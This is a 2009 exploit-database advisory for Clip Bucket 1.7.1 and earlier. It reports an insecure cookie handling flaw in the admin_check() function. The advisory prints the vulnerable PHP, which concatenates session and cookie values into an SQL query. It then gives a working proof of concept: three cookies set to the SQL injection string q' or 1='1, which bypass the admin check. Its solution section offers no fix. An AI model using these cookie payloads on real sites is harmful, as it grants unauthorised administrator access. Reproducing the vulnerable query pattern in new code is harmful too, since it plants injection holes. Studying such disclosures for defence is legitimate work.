[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Clip Bucket <= 1.7.1 Insecure Cookie Handling Vulnerability
# Published : 2009-07-24
# Author : Qabandi
# Previous Title : RunCMS <= 1.6.3 (double ext) Remote Shell Injection Exploit
# Next Title : Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln


||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ__
                                        __/QQQ/````````````````QQQ___
                                      _/QQQQQ/                  QQQQQQ
                                     /QQQQ/``                    ```QQQQ
                                    /QQQQ/                          QQQQ
                                   |QQQQ/    By  Qabandi             QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ       iqa[a]hotmail.fr     /QQQQ|
                                    QQQQ                      __  /QQQQ/
                                     QQQQ                    /QQ_QQQQ/
                                      QQQQ                   QQQQQQQ/
                                       QQQQQ                 /QQQQQ/_
                                        ``QQQQQ_____________/QQQ/QQQQ_
                                           ``QQQQQQQQQQQQQQQQQQQ/  `QQQQ
                                              ```````````````````     `````

=Vuln:		Clip Bucket <= 1.7.1 Insecure Cookie Handling
=INFO:		http://clip-bucket.com/
=BUY:  		---
=Download:      http://clip-bucket.com/download
=DORK:	  :) 

                                  ____________
                              _-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE OFF

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in "includesclassesuser.class.php"

	function admin_check(){
		$admin = 'Admin';
        if(isset($_COOKIE['userid']) && isset($_COOKIE['username']) && isset($_COOKIE['session']))
        {
		$userid = @$_SESSION['userid'];
		$username = @$_SESSION['username'];
		$session = @$_COOKIE['PHPSESSID'];

					$query = mysql_query("SELECT * FROM users WHERE level='".$admin."' AND username ='".$username."' AND userid = '".$userid."' AND session='".$session."'");
					if(mysql_num_rows($query)>0){
					$answer = 1;
                    return $answer;
					}else{
					$answer = 0;
                    return $answer;
					}
        }
		}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
Set Cookies:

userid=q' or 1='1
username=q' or 1='1
session=q' or 1='1


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
nah

---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              
|      ----------------------------------------------------------------------  |
______________________________________________________________________________/
                                 No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# www.Syue.com [2009-07-24]